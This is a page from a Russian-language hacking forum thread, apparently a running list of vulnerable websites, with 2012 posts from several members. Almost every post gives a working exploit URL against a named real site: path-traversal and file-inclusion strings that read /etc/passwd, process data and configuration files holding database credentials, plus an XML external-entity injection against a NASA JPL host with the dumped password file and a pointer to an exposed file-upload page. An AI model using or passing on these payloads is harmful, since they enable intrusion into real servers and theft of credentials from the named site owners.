HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1321  
Старый 19.06.2012, 05:59
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию

http://www.horizont.by/index.php?page=../../../../proc/self/cmdline%00
 
Ответить с цитированием

  #1322  
Старый 20.06.2012, 11:44
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию

НЭИС-Телеком Сибирь - Спутниковое телевидение Триколор (надоела их реклама) тИЦ: 80 / PR: 2

Код:
Code:
http://www.satnsk.ru/index.php?view=/etc/passwd
 
Ответить с цитированием

  #1323  
Старый 21.06.2012, 19:05
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Эти ребята ничему не учатся =/

Ещё 1 XML-Inject на NASA.GOV

Host = solidearth.jpl.nasa.gov

Query


Код:
Code:

 ]>

  
      
        
          bodyclientIdcorrelationId
          destinationheadersmessageId
          operationtimestamptimeToLive
        
        
        
        
          
            DSIdDSMessagingVersion
          
          nil1
        
        &x3;
  500
Answear:

Код:
Code:
root:x:0:0:Super-User:/:/sbin/sh 
daemon:x:1:1::/: bin:x:2:2::/usr/bin:/bin/false 
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm:/bin/false 
lp:x:71:8:Line Printer Admin:/usr/spool/lp:/bin/false 
uucp:x:5:5:uucp Admin:/usr/lib/uucp:/bin/false 
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/bin/false 
smmsp:x:25:25:SendMail Message Submission Program:/:/bin/false 
isten:x:37:4:Network Admin:/usr/net/nls:/bin/false 
gdm:x:50:50:GDM Reserved UID:/:/bin/false 
webservd:x:80:80:WebServer Reserved UID:/opt/home/webservd:/bin/pfsh 
postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh 
svctag:x:95:12:Service Tag UID:/: 
nobody:x:60001:60001:NFS Anonymous Access User:/:/bin/false 
noaccess:x:60002:60002:No Access User:/:/bin/false 
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous 
Access User:/:/bin/false metrics:x:150:10:System Metrics Account:/opt/metrics:/bin/sh 
pdiag:x:153:10:Patchdiag Account:/opt/pdiag:/bin/sh 
sysaudit:x:152:10:System Audit Account:/opt/sysaudit:/bin/sh 
netiqamc:x:65535:65535::/opt/netiqamc:/bin/sh +@jplit-sa:x:::::: +@web:x:::::: +@ops-level2:x::::::
Ну и вот ещё

Код:
Code:
_ttp://solidearth.jpl.nasa.gov/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/upload/test.html
...если вы понимаете о чём я... =)
 
Ответить с цитированием

  #1324  
Старый 22.06.2012, 01:57
.Varius
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
Провел на форуме:
5777251

Репутация: 796


По умолчанию

Читалка

/var/www/web4/html/en-relaunch-2008/download.php

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/
COLOR][/COLOR
данные для подключения к бд

http://relaunch.falken-europe.com/download.php?imgName=../../../includes/php/ProjectSettingsInc.php

http://relaunch.falken-europe.com/download.php?imgName=../../../index.php

скуля

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]getAdminTemplateContent[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"aModulEdit.htt"[/COLOR][COLOR="#007700"]);

include[/COLOR][COLOR="#DD0000"]"admin_usr_includes/a"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'adminusrincludes'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"Inc.php"[/COLOR][COLOR="#007700"];

}

elseif([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'adminusrincludes'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'adminsysincludes'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])

{

[/
COLOR][COLOR="#0000BB"]$pageOutput[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$abAP[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getAdminTemplateContent[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"aModulEdit.htt"[/COLOR][COLOR="#007700"]);

include[/COLOR][COLOR="#DD0000"]"admin_sys_includes/a"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'adminsysincludes'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"Inc.php"[/COLOR][COLOR="#007700"];

}

[/
COLOR][COLOR="#FF8000"]/* END Global PHP Modul/usr_include editor */

[/COLOR][/COLOR
 
Ответить с цитированием

  #1325  
Старый 26.06.2012, 00:01
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

Немного рекурсии.

http://www.sghp.ru/index.php?page=index.php
 
Ответить с цитированием

  #1326  
Старый 28.06.2012, 19:52
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

http://www.vip-conferance.ru/foto.php?id=index
 
Ответить с цитированием

  #1327  
Старый 28.06.2012, 21:01
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

Ростелеком

http://stcm.ru/download.php?f=download.php
 
Ответить с цитированием

  #1328  
Старый 04.07.2012, 22:42
^NSA^
Guest
Сообщений: n/a
Провел на форуме:
19040

Репутация: 32
По умолчанию

inthebreeze

Цитата:
Сообщение от None  
http://www.inthebreeze.com/index.php?action=../../../../etc/passwd%00
 
Ответить с цитированием

  #1329  
Старый 05.07.2012, 04:33
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

http://www.cazino-monteoru.ro/index.php?pg=/home/config/passwd-proftpd.conf
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #1330  
Старый 05.07.2012, 18:27
^NSA^
Guest
Сообщений: n/a
Провел на форуме:
19040

Репутация: 32
По умолчанию

polaris-inc

http://www.polaris-inc.com/index.php?action=../../../../etc/passwd%00
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ